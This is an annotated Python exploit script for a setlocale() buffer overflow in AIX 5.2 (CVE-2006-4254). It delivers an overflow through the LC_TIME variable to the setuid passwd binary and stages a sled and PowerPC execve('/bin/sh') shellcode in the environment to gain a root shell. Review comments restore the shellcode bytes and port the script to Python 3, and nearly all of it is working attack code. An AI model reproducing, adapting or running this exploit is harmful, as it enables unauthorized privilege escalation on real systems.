No description provided by source.
#
# setlocale() buffer-overflow exploit for AIX 5.2 (CVE-2006-4254): the
# overflow is delivered through the LC_TIME environment variable to the
# setuid /usr/bin/passwd binary, which calls setlocale() on start-up.
#[email protected]
#
from os import execve
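# NOTE(review): the listing as published lost every "\x" backslash in
# transit ("x7cxa5x2ax79" instead of "\x7c\xa5\x2a\x79"), so as written it
# sent ASCII text, not machine code.  The bytes below are restored from the
# mnemonic annotations: e.g. "xor. r5,r5,r5" encodes as 0x7ca52a79 on PowerPC.
# Everything is kept as bytes so the high bytes (0xf2, 0xff, ...) reach
# execve() verbatim under Python 3 as well (as str they would be UTF-8
# encoded and corrupted); under the original Python 2 bytes == str.

# Overflow string handed to setlocale() via LC_TIME: 580 bytes of filler,
# 12 bytes of marker filler (bbbb/cccc/dddd), then the 4-byte value that
# overwrites the return address, 0x2ff2282f.  That is an AIX user-stack
# address, presumably chosen to land inside the EGG sled below; the padding
# length and the address are specific to the author's AIX 5.2 build and will
# need re-deriving for any other target.
BOF = b"a" * 580 + b"bbbbccccdddd" + b"\x2f\xf2\x28\x2f"

# Landing zone exported in the environment as EGG: 2350 bytes of 0x60 in
# front of the shellcode.  NOTE(review): 0x60606060 decodes as a harmless
# PowerPC `ori`, which is why it works as sled filler -- confirm on target.
EGG = b"\x60" * 2350

# PowerPC execve("/bin/sh") payload, by intropy <at> caughq.org.
# Position-independent: `bnel` is not taken (xor. leaves cr0 EQ set) but
# still writes the address of the following `mflr` into LR, so r31 ends up
# pointing 0x120 past it.  Offsets from r31 resolve as: -248 -> "/bin/sh"
# (byte 48), -241 -> the trailing 0x05 (byte 55), -240 -> argv (byte 56).
# The code NUL-terminates "/bin/sh" in place, builds argv = [r3, NULL],
# zeroes r5 for envp, loads 0x05 into r2 (presumably the AIX syscall
# selector for execve), sets cr6 and issues `svca`.
SHELLCODE = (
    b"\x7c\xa5\x2a\x79"  # xor.  r5,r5,r5        r5 = 0, cr0 = EQ
    b"\x40\x82\xff\xfd"  # bnel  <shellcode>     not taken; LR = next insn
    b"\x7f\xe8\x02\xa6"  # mflr  r31
    b"\x3b\xff\x01\x20"  # cal   r31,0x120(r31)
    b"\x38\x7f\xff\x08"  # cal   r3,-248(r31)    r3 -> "/bin/sh"
    b"\x38\x9f\xff\x10"  # cal   r4,-240(r31)    r4 -> argv
    b"\x90\x7f\xff\x10"  # st    r3,-240(r31)    argv[0] = r3
    b"\x90\xbf\xff\x14"  # st    r5,-236(r31)    argv[1] = NULL
    b"\x88\x5f\xff\x0f"  # lbz   r2,-241(r31)    r2 = 0x05
    b"\x98\xbf\xff\x0f"  # stb   r5,-241(r31)    NUL-terminate "/bin/sh"
    b"\x4c\xc6\x33\x42"  # crorc cr6,cr6,cr6
    b"\x44\xff\xff\x02"  # svca
    b"/bin/sh"
    b"\x05"
)


def main():
    """Exec /usr/bin/passwd with the crafted environment.

    LC_TIME carries the overflow string and EGG the sled plus shellcode;
    argv[0] is deliberately empty, as in the original.  execve() replaces
    this process, so the call does not return on success; it raises OSError
    if /usr/bin/passwd cannot be executed.  Only meaningful on an unpatched
    AIX 5.2 host with a setuid passwd -- elsewhere it simply runs passwd.
    """
    execve(
        b"/usr/bin/passwd",
        [b""],
        {b"EGG": EGG + SHELLCODE, b"LC_TIME": BOF},
    )


# Guarded so importing the module (or running tests against it) does not
# exec passwd; `python <file>` behaves as the original script did.
if __name__ == "__main__":
    main()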
# sebug.net